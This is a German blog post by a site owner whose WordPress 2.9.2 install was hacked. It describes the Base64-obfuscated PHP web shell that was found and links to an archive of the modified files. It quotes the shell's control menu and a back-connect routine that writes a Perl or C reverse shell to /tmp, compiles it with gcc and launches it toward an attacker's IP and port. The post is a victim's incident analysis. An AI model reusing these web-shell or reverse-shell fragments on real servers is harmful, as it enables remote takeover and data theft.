Ich wurde gehackt

Der WordPress-Problem von Vorgestern ist ein Hack!

Neuste WordPress-Version und ich kann nichts dagegen machen, als Passwörter zu tauschen und die DB zu sichern. Verdammt.

Thread im WordPress.com Forum.

Nachtrag:

Hab es meinem Provider gemeldet für den Fall, dass es nicht WordPress-spezifisch ist, sondern die Lücke am Server an sich liegt.

Für alle, die sich die veränderten Dateien anschauen wollen: https://www.caracasa.de/files/hacked_files.tar.bz2

Das Reverse-engineeren ist gar nicht so einfach, wenn der Hacker alles Base64 kodiert und immer wieder verschachtelt mit eval interpretieren lässt.
Damn you php und all scripting-languages!

Nachtrag2:

Laut Code,  kann der Hacker beliebige Dateien anfordern, ein Backup der MySQL-Datenbank machen, phpinfo() aufrufen, Befehle ausführen und beliebigen PHP-Code ausführen. Alles schön gesteuert über eine kleine Webseite mit Login über Javascript.

<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('logout');"&gt;Logout&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('file');"&gt;File Manager&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('sqladmin');"&gt;MySQL Manager&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('sqlfile');"&gt;MySQL Upload &amp;amp; Download&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('shell');"&gt;Execute Command&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('phpenv');"&gt;PHP Variable&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('eval');"&gt;Eval PHP Code&lt;/a&gt;
 
<span style="white-space: pre;"> </span>&lt;?php if (!IS_WIN) {?&gt; | &lt;a href="javascript:goaction('backconnect');"&gt;Back Connect&lt;/a&gt;&lt;?php }?&gt;
 
<span style="white-space: pre;"> </span>&lt;/td&gt;

Der Kompiliert sich sogar was Nettes mit dem GCC

if ($use == 'perl') {
<div id="_mcePaste">cf('/tmp/angel_bc',$back_connect);</div>
<div id="_mcePaste">$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &amp;");</div>
<div id="_mcePaste">} else {</div>
<div id="_mcePaste">cf('/tmp/angel_bc.c',$back_connect_c);</div>
<div id="_mcePaste">$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');</div>
<div id="_mcePaste">@unlink('/tmp/angel_bc.c');</div>
<div id="_mcePaste">$res = execute("/tmp/angel_bc $yourip $yourport &amp;");</div>
if ($use == 'perl') {			cf('/tmp/angel_bc',$back_connect);			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &amp;");		} else {			cf('/tmp/angel_bc.c',$back_connect_c);			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');			@unlink('/tmp/angel_bc.c');			$res = execute("/tmp/angel_bc $yourip $yourport &amp;");

So richtig kompatibel mit der aktuellen WordPress-Version (2.9.2) scheint das Script ja nicht zu sein, wenn es sich mit den erwähnten Ausfällen bemerkbar macht.

Grad noch gefunden – ein Plugin für WordPress um Exploits zu finden:
http://wordpress.org/extend/plugins/exploit-scanner/

Das läuft gerade, aber die entsprechenden Dateien sind ja schon weg.

hier geht es weiter: Ich wurde gehackt 2

Ein Gedanke zu „Ich wurde gehackt

  1. Pingback: Ich wurde gehackt 2 | caracasa.de

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.